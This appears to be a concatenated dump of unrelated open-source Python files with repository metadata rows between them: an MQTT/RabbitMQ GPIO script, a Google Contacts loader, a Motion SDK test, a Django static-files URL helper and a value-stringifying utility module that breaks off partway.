chan.basic_consume(callback, queue=q, no_ack=True)
chan.start_consuming()
class mqttConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting MQTT"
mqttc = mqtt.Client()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.connect("mohawk.link", 1883, 60)
mqttc.loop_forever()
class main():
# Setup the pins
GPIO.setmode(GPIO.BOARD)
GPIO.setup(OUTPUT_PIN, GPIO.OUT)
myThreadObj1 = rabbitConnect()
myThreadObj1.start()
myThreadObj2 = mqttConnect()
myThreadObj2.start()
myThreadObj1.join()
myThreadObj2.join()
if __name__ == "__main__":
main()
| mit | 8,074,197,039,635,007,000 | 22.052632 | 61 | 0.694635 | false | 2.839546 | false | false | false |
jakublipinski/i2Gmail-Backup-macOS-Messages-To-Gmail | contacts.py | 1 | 2674 | import gdata.data
import gdata.contacts.client
import gdata.contacts.data
import string
import config
class Contacts:
def __init__(self, credentials):
auth2token = gdata.gauth.OAuth2Token(client_id=credentials.client_id,
client_secret=credentials.client_secret,
scope='https://www.google.com/m8/feeds/contacts/default/full',
access_token=credentials.id_token,
refresh_token=credentials.refresh_token,
user_agent=config.APPLICATION_NAME)
self.client = gdata.contacts.client.ContactsClient()
auth2token.authorize(self.client)
self.email_to_name = {}
self.phone_to_name = {}
def load_contacts(self):
max_results = 99999
start_index = 1
query = gdata.contacts.client.ContactsQuery()
query.max_results = max_results
query.start_index = start_index
feed = self.client.GetContacts(q=query)
while feed:
for i, entry in enumerate(feed.entry):
if entry.name:
full_name = entry.name.full_name.text
primary_email = None
for email_entry in entry.email:
email = email_entry.address.lower()
if email_entry.primary and email_entry.primary=="true":
primary_email = email
if email in self.email_to_name:
print(u"Email address: '{}' is assigned to both '{}' and '{}'!".\
format(email, self.email_to_name[email], full_name))
else:
self.email_to_name[email] = (full_name, u'%s <%s>' % (full_name, email))
for phone_number_entry in entry.phone_number:
phone_number = Contacts.strip_and_reverse_phone_number(phone_number_entry.text)
if phone_number in self.phone_to_name:
print("Phone number: '%s' is assigned to both '%s' and '%s'!"%
(phone_number_entry.text, self.phone_to_name[phone_number], full_name))
else:
if primary_email:
self.phone_to_name[phone_number] = (
full_name, u'%s <%s>' % (full_name, primary_email))
else:
self.phone_to_name[phone_number] = (full_name, u'%s <%s>' % (full_name, phone_number_entry.text))
next_link = feed.GetNextLink()
if next_link:
feed = self.client.GetContacts(uri=next_link.href)
else:
feed = None
def get_by_phone_number(self, phone_number):
phone_number = Contacts.strip_and_reverse_phone_number(phone_number)
return self.phone_to_name.get(phone_number)
def get_by_email(self, email):
email = email.lower()
return self.email_to_name.get(email)
@staticmethod
def strip_and_reverse_phone_number(phone_number):
number = ''.join(ch for ch in phone_number if ch.isdigit())
if len(number)<3:
return phone_number
number = number[-9:]
number = number[::-1]
return number
| mit | 2,101,036,142,555,594,800 | 32.012346 | 105 | 0.665669 | false | 3.098494 | false | false | false |
bmswgnp/sdk | python/test.py | 1 | 5131 | #
# Simple test program for the Python Motion SDK.
#
# @file tools/sdk/python/test.py
# @author Luke Tokheim, [email protected]
# @version 2.2
#
# Copyright (c) 2015, Motion Workshop
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
from MotionSDK import *
PortPreview = 32079
PortSensor = 32078
PortRaw = 32077
PortConfigurable = 32076
PortConsole = 32075
NSample = 10
def test_Client(host, port):
client = Client(host, port)
print "Connected to " + str(host) + ":" + str(port)
xml_string = "<?xml version=\"1.0\"?><configurable><preview><Gq/></preview><sensor><a/></sensor></configurable>"
if client.writeData(xml_string):
print "Sent active channel definition to Configurable service"
if client.waitForData():
sample_count = 0
while sample_count < NSample:
data = client.readData()
if None == data:
break
if PortPreview == port:
container = Format.Preview(data)
for key in container:
q = container[key].getQuaternion(False)
print "q(" + str(key) + ") = (" + str(q[0]) + ", " + str(q[1]) + "i, " + str(q[2]) + "j, " + str(q[3]) + "k)"
if PortSensor == port:
container = Format.Sensor(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ") g"
if PortRaw == port:
container = Format.Raw(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ")"
if PortConfigurable == port:
container = Format.Configurable(data)
for key in container:
line = "data(" + str(key) + ") = ("
for i in range(container[key].size()):
if i > 0:
line += ", "
line += str(container[key].value(i))
line += ")"
print line
sample_count += 1
def test_LuaConsole(host, port):
client = Client(host, port)
print("Connected to " + str(host) + ":" + str(port))
#
# General Lua scripting interface.
#
lua_chunk = \
"if not node.is_reading() then" \
" node.close()" \
" node.scan()" \
" node.start()" \
" end" \
" if node.is_reading() then" \
" print('Reading from ' .. node.num_reading() .. ' device(s)')" \
" else" \
" print('Failed to start reading')" \
" end"
print LuaConsole.SendChunk(client, lua_chunk, 5)
# Scripting language compatibility class. Translate
# Python calls into Lua calls and send them to the
# console service.
node = LuaConsole.Node(client)
print "node.is_reading() = " + str(node.is_reading())
def test_File():
filename = "../../test_data/sensor.bin";
print "reading take data file: \"" + filename + "\""
take_file = File(filename)
while True:
data = take_file.readData(9, True)
if None == data:
break
print Format.SensorElement(data).getAccelerometer()
def main(argv):
# Set the default host name parameter. The SDK is
# socket based so any networked Motion Service is
# available.
host = ""
if len(argv) > 1:
host = argv[1]
test_LuaConsole(host, PortConsole)
test_Client(host, PortPreview)
test_Client(host, PortSensor)
test_Client(host, PortRaw)
test_Client(host, PortConfigurable)
test_File()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| bsd-2-clause | 1,064,305,266,750,681,900 | 31.474684 | 129 | 0.588384 | false | 3.881241 | true | false | false |
bop/foundation | lib/python2.7/site-packages/staticfiles/urls.py | 1 | 1283 | import re
from django.conf import settings
from django.conf.urls.defaults import patterns, url
from django.core.exceptions import ImproperlyConfigured
urlpatterns = []
def static(prefix, view='django.views.static.serve', **kwargs):
"""
Helper function to return a URL pattern for serving files in debug mode.
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = patterns('',
# ... the rest of your URLconf goes here ...
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
"""
# No-op if not in debug mode or an non-local prefix
if not settings.DEBUG or (prefix and '://' in prefix):
return []
elif not prefix:
raise ImproperlyConfigured("Empty static prefix not permitted")
return patterns('',
url(r'^%s(?P<path>.*)$' % re.escape(prefix.lstrip('/')), view, kwargs=kwargs),
)
def staticfiles_urlpatterns(prefix=None):
"""
Helper function to return a URL pattern for serving static files.
"""
if prefix is None:
prefix = settings.STATIC_URL
return static(prefix, view='staticfiles.views.serve')
# Only append if urlpatterns are empty
if settings.DEBUG and not urlpatterns:
urlpatterns += staticfiles_urlpatterns()
| gpl-2.0 | 5,661,768,768,317,236,000 | 31.075 | 86 | 0.686672 | false | 4.29097 | false | false | false |
SKIRT/PTS | core/tools/stringify.py | 1 | 41185 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.tools.stringify Provides useful functions for converting objects of various types to strings.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import standard modules
import copy
import warnings
# Import the relevant PTS classes and modules
from . import types
from . import introspection
from . import sequences
from . import strings
from . import numbers
# -----------------------------------------------------------------
def tostr(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get the 'scientific' flag
scientific = kwargs.get("scientific", None)
scientific_int = kwargs.pop("scientific_int", True) # also represent integers in scientific notation
# Set default number of decimal places
#decimal_places = kwargs.pop("decimal_places", None) # let it be done automatically in the str_from_... function
#print(str(value), "nd", decimal_places)
#ndigits = kwargs.pop("ndigits", None)
decimal_places = kwargs.get("decimal_places", None)
ndigits = kwargs.get("ndigits", None)
# Set scientific flag flexibly, if scientific flag was not passed explicitly
if scientific is None:
# Integer value
if (scientific_int and types.is_integer_type(value)) or (types.is_real_type(value) and numbers.is_integer(value)):
# Convert to be certain (if from float)
value = int(value)
#if -1e4 <= value <= 1e4: scientific = False
if -999 < value < 999:
scientific = False
if ndigits is None: decimal_places = 0
else: scientific = True
# No decimals for integers
#decimal_places = 0 YES: OF COURSE THERE MUST BE DECIMAL PLACES FOR SCIENTIFIC NOTATION
# Real value
elif types.is_real_type(value):
#if -1e4 <= value <= 1e4: scientific = False
if -999.99 < value < 999.99: scientific = False
else: scientific = True
# Quantity
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units", return_false_if_fail=True):
if -999.99 < value.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min.value and value.max.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min and value.max < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range", return_false_if_fail=True):
if -999 < value.min and value.max < 999: scientific = False
else: scientific = True
# Other
else: scientific = False
#print("scien", scientific)
#print("dec", decimal_places)
#print("nd", ndigits)
# Set the options
kwargs["scientific"] = scientific
kwargs["decimal_places"] = decimal_places
kwargs["ndigits"] = ndigits
# Set scientific flag for integers
elif types.is_integer_type(value) or (types.is_real_type(value) and numbers.is_integer(value)):
if scientific:
# ONLY IF SCIENTIFIC_INT IS TRUE
if scientific_int:
# ONLY IF NECESSARY
if -999 < value < 999: scientific = False
else: scientific = True
# Don't apply 'scientific' to integers
else: scientific = False
# Set flag
kwargs["scientific"] = scientific
kwargs["ndigits"] = ndigits
# Stringify
return stringify(value, **kwargs)[1].strip()
# -----------------------------------------------------------------
def stringify(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# List or derived from list
if isinstance(value, list): return stringify_list(value, **kwargs)
# Dictionary
if isinstance(value, dict): return stringify_dict(value, **kwargs)
# Array or derived from Array, but not quantity!
#elif isinstance(value, np.ndarray) and not isinstance(value, Quantity):
#elif introspection.try_importing_module("numpy", True) and (isinstance(value, np.ndarray) and not hasattr(value, "unit")):
# WE ALSO TEST IF THIS IS NOT A NUMPY INTEGER, FLOAT OR BOOLEAN (because they have a __array__ attribute)
elif types.is_array_like(value): return stringify_array(value, **kwargs)
# Column or masked masked column
elif types.is_astropy_column(value): return stringify_array(value, **kwargs)
# Tuple or derived from tuple
elif isinstance(value, tuple): return stringify_tuple(value, **kwargs)
# All other
#else: return stringify_not_list(value, scientific=scientific, decimal_places=decimal_places, fancy=fancy, ndigits=ndigits, unicode=unicode, **kwargs)
else: return stringify_not_list(value, **kwargs)
# -----------------------------------------------------------------
def get_parsing_type(value):
"""
This function ...
:param value:
:return:
"""
ptype, string = stringify(value)
return ptype
# -----------------------------------------------------------------
def can_get_item(value):
"""
This function ...
:param value:
:return:
"""
#print(value, type(value))
try:
length = len(value)
except TypeError: return False
if len(value) == 0: return True
else:
try:
item = value[0]
return True
except IndexError: return False
# -----------------------------------------------------------------
def get_strings(values, return_types=False, value_kwargs=None, add_quotes=False, quote_character="'"):
"""
This function ...
:param values:
:param return_types:
:param value_kwargs:
:param add_quotes:
:param quote_character:
:return:
"""
if value_kwargs is None: value_kwargs = {}
strings = []
ptype = None
ptypes = set()
# Loop over the values
for entry in values:
# parsetype, val = stringify_not_list(entry)
parsetype, val = stringify(entry, **value_kwargs)
# from ..basics.configuration import parent_type
# if add_quotes and parent_type(parsetype) == "string":
if add_quotes and types.is_string_type(entry): val = quote_character + val + quote_character
if ptype is None: ptype = parsetype
elif ptype != parsetype:
# raise ValueError("Nonuniform list")
ptype = "mixed"
# Add the parse type
ptypes.add(parsetype)
# Add the string
strings.append(val)
# Return the strings
if return_types: return strings, list(ptypes), ptype
else: return strings
# -----------------------------------------------------------------
def stringify_list(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#print("kwargs", kwargs)
#if len(value) == 0: raise ValueError("Cannot stringify an empty list")
if len(value) == 0: return "list", ""
# If delimiter is passed for stringifying the values in the list
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
elif "delimiter" in value_kwargs: del value_kwargs["delimiter"]
# If delimiter is passed for stringifying the keys in the list
#key_kwargs = copy.copy(kwargs)
#if "key_delimiter" in key_kwargs: key_kwargs["delimiter"] = key_kwargs.pop("key_delimiter")
#elif "delimiter" in key_kwargs: del key_kwargs["delimiter"]
# If quotes have to be added
add_quotes = kwargs.pop("add_quotes", False)
quote_character = kwargs.pop("quote_character", "'")
# Get strings
strings, ptypes, ptype = get_strings(value, return_types=True, value_kwargs=value_kwargs, add_quotes=add_quotes, quote_character=quote_character)
from ..basics.configuration import parent_type
from ..basics.log import log
if len(ptypes) == 1: ptype = ptypes[0]
elif sequences.all_equal(ptypes): ptype = ptypes[0]
else:
# Investigate the different ptypes
parent_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_types)):
if parent_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_types))
#print("Parent types:", parent_types)
if sequences.all_equal(parent_types) and parent_types[0] is not None: ptype = parent_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_types)[1] + "'")
# Get delimiter for list
delimiter = kwargs.pop("delimiter", ",")
# Return the type and the string
if ptype.endswith("list"):
top_delimiter = delimiter + " "
return ptype + "_list", top_delimiter.join(strings)
else: return ptype + "_list", delimiter.join(strings)
# -----------------------------------------------------------------
def represent_dict(value, **kwargs):
"""
Thisf unction ...
:param value:
:param kwargs:
:return:
"""
if len(value) == 0: return ""
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
parts = []
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
# DON't QUOTE THESE
if vtype == "integer" or vtype == "real" or vtype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_dict(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#if len(value) == 0: raise ValueError("Cannot stringify an empty dictionary")
if len(value) == 0: return "dictionary", ""
keytype = None
ptype = None
parts = []
keytypes = set()
ptypes = set()
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
# Add key type
keytypes.add(ktype)
# Check key type
if keytype is None: keytype = ktype
elif keytype != ktype: keytype = "mixed"
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Add value type
ptypes.add(vtype)
# Check value type
if ptype is None: ptype = vtype
elif ptype != vtype: ptype = "mixed"
# if quote_key and key not in no_quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# else: kstring_with_quotes = kstring
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
#if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
#elif quote_value and key not in no_quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
#else: vstring_with_quotes = vstring
# DON't QUOTE THESE
if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
from ..basics.configuration import parent_type
from ..basics.log import log
keytypes = list(keytypes)
ptypes = list(ptypes)
# Investigate the different keytypes
parent_key_types = [parent_type(type_name) for type_name in keytypes]
#print("Parent key types:", parent_key_types)
# Check
for i in range(len(parent_key_types)):
if parent_key_types[i] is None: log.warning("Could not determine the parent type for '" + keytypes[i] + "'. All parent types: " + str(parent_key_types))
if sequences.all_equal(parent_key_types) and parent_key_types[0] is not None: ptype = parent_key_types[0]
elif keytype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_key_types)[1] + "'")
# Investigate the different value types
parent_value_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_value_types)):
if parent_value_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_value_types))
#print("Parent value types:", parent_value_types)
if sequences.all_equal(parent_value_types) and parent_value_types[0] is not None: ptype = parent_value_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_value_types)[1] + "'")
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return keytype + "_" + ptype + "_dictionary", delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_array(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
ptype, val = stringify_not_list(value[0], **kwargs)
if ptype is None: return "array", delimiter.join([repr(el) for el in value])
else: return ptype + "_array", delimiter.join([repr(el) for el in value])
#ptype, val = stringify_not_list(value[0])
#return ptype + "_array", ",".join([repr(el) for el in value])
# -----------------------------------------------------------------
def stringify_tuple(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
#print("kwargs", kwargs)
strings = []
ptype = None
for entry in value:
#parsetype, val = stringify_not_list(entry, **kwargs)
parsetype, val = stringify(entry, **kwargs)
if ptype is None:
ptype = parsetype
elif ptype != parsetype:
#raise ValueError("Nonuniform tuple")
warnings.warn("Nonuniform tuple")
ptype = "mixed"
strings.append(val)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
if ptype is not None: return ptype + "_tuple", delimiter.join(strings)
else: return "tuple", delimiter.join(strings)
# -----------------------------------------------------------------
def stringify_not_list(value, **kwargs):
"""
This function does stringify, but not for iterables
:param value:
:param kwargs:
:return:
"""
# Standard
if types.is_boolean_type(value): return "boolean", str_from_bool(value, **kwargs)
elif types.is_integer_type(value): return "integer", str_from_integer(value, **kwargs)
elif types.is_real_type(value): return "real", str_from_real(value, **kwargs)
elif types.is_string_type(value): return "string", value
elif types.is_none(value): return "None", kwargs.pop("none_string", "None")
# Unit, quantity, angle
elif introspection.lazy_isinstance(value, "UnitBase", "astropy.units"): return introspection.lazy_call("stringify_unit", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units"): return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Angle", "astropy.coordinates"): return "angle", str_from_angle(value, **kwargs)
# Range
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range"): return "real_range", str_from_real_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range"): return "integer_range", str_from_integer_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range"): return "quantity_range", introspection.lazy_call("str_from_quantity_range", "pts.core.units.stringify", value, **kwargs)
# Coordinates
elif introspection.lazy_isinstance(value, "SkyCoordinate", "pts.magic.basics.coordinate"): return "skycoordinate", str_from_coordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PixelCoordinate", "pts.magic.basics.coordinate"): return "pixelcoordinate", str_from_pixelcoordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalCoordinate", "pts.magic.basics.coordinate"): return "physicalcoordinate", str_from_physicalcoordinate(value, **kwargs)
# Stretch
#elif introspection.lazy_isinstance(value, "SkyStretch", "pts.magic.basics.stretch"): return "skystretch", str_from_stretch(value, **kwargs)
# Extents
elif introspection.lazy_isinstance(value, "SkyExtent", "pts.magic.basics.stretch"): return "sky_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalExtent", "pts.magic.basics.stretch"): return "physical_extent", str_from_quantity_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerExtent", "pts.magic.basics.vector"): return "integer_extent", str_from_integer_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "RealExtent", "pts.magic.basics.vector"): return "real_extent", str_from_real_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "AngleExtent", "pts.magic.basics.vector"): return "angle_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityExtent", "pts.magic.basics.vector"): return "quantity_extent", str_from_quantity_extent(value, **kwargs)
# Filter
elif introspection.lazy_isinstance(value, "Filter", "pts.core.filter.filter"): return introspection.lazy_call("stringify_filter", "pts.core.filter.filter", value, **kwargs)
# Pixelscale
elif introspection.lazy_isinstance(value, "Pixelscale", "pts.magic.basics.pixelscale"): return "pixelscale", str(value)
# Parallelization
elif introspection.lazy_isinstance(value, "Parallelization", "pts.core.simulation.parallelization"): return "parallelization", introspection.lazy_call("represent_parallelization", "pts.core.simulation.parallelization", value)
# Host
elif introspection.lazy_isinstance(value, "Host", "pts.core.remote.host"): return "host", str_from_host(value)
# Unrecognized
else:
warnings.warn("Unrecognized type: " + str(type(value)))
return None, str(value)
# -----------------------------------------------------------------
def str_from_host(host):
"""
This function ...
:param host:
:return:
"""
if host.cluster_name is not None: return host.id + ":" + host.cluster_name
else: return host.id
# -----------------------------------------------------------------
def str_from_dictionary(dictionary, **kwargs):
"""
This function ...
:param dictionary:
:param kwargs:
:return:
"""
parts = []
for key in dictionary:
value = dictionary[key]
vtype, vstring = stringify(value, **kwargs)
string = key + ": " + vstring
parts.append(string)
return ",".join(parts)
# -----------------------------------------------------------------
def stringify_string_fancy(string, **kwargs):
"""
This function ...
:param string:
:return:
"""
width = kwargs.pop("width", 100)
lines_prefix = kwargs.pop("lines_prefix", "")
from textwrap import wrap
return "string", lines_prefix + ("\n" + lines_prefix).join(wrap(string, width))
# -----------------------------------------------------------------
def stringify_list_fancy(lst, **kwargs):
"""
This function ...
:param lst:
:param kwargs:
:return:
"""
width = kwargs.pop("width", 100)
delimiter = kwargs.pop("delimiter", ", ")
lines_prefix = kwargs.pop("lines_prefix", "")
colour = kwargs.pop("colour", None)
colour_indices = kwargs.pop("colour_indices", None) # colour only certain indices
from textwrap import wrap
ptype, string = stringify(lst)
if colour is not None:
from .formatting import get_color_code, reset
code = get_color_code(colour)
if colour_indices is not None:
parts = string.split(",")
new_parts = []
for index, part in enumerate(parts):
if index in colour_indices: new_part = code + part + reset
else: new_part = part
new_parts.append(new_part)
string = ",".join(new_parts)
else: string = code + string + reset
return ptype, lines_prefix + ("\n" + lines_prefix).join(wrap(string.replace(",", delimiter), width))
# -----------------------------------------------------------------
def get_list_string_max_nvalues(lst, nvalues, **kwargs):
"""
This function ...
:param lst:
:param values:
:param kwargs:
:return:
"""
# Define string
ellipsis = ", ... , "
# Get options
delimiter = kwargs.pop("delimiter", ", ")
# Get strings
strings = get_strings(lst)
# Return
if len(lst) <= nvalues: return delimiter.join(strings)
# Add ellipses
else:
if nvalues % 2 == 0: nbegin = nend = int(0.5 * nvalues)
else:
nbegin = int(0.5 * nvalues)
nend = nvalues - nbegin
# Create string, return
return delimiter.join(strings[:nbegin]) + ellipsis + delimiter.join(strings[-nend:])
# -----------------------------------------------------------------
def stringify_paths(paths, **kwargs):
"""
This function ...
:param paths:
:param kwargs:
:return:
"""
# Get options
base = kwargs.pop("basse", None)
if base is None: return "path_list", stringify_list(paths)[1]
else:
from . import filesystem as fs
absolute_base = fs.absolute_path(base)
# Return the type and the relative paths as a string list
return "string_list", stringify_list([fs.absolute_path(path).split(absolute_base)[1] for path in paths])[1]
# -----------------------------------------------------------------
def str_from_integer(integer, **kwargs):
"""
This function ...
:param integer:
:param kwargs:
:return:
"""
# Get settings
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
html = kwargs.pop("html", False)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(scientific, decimal_places, ndigits)
# Scientific notation
if scientific:
if fancy:
if ndigits is not None:
power = len(str(integer)) - 1
digits = []
str_rounded = str(integer)
for i in range(ndigits):
digit = str_rounded[i]
digits.append(digit)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
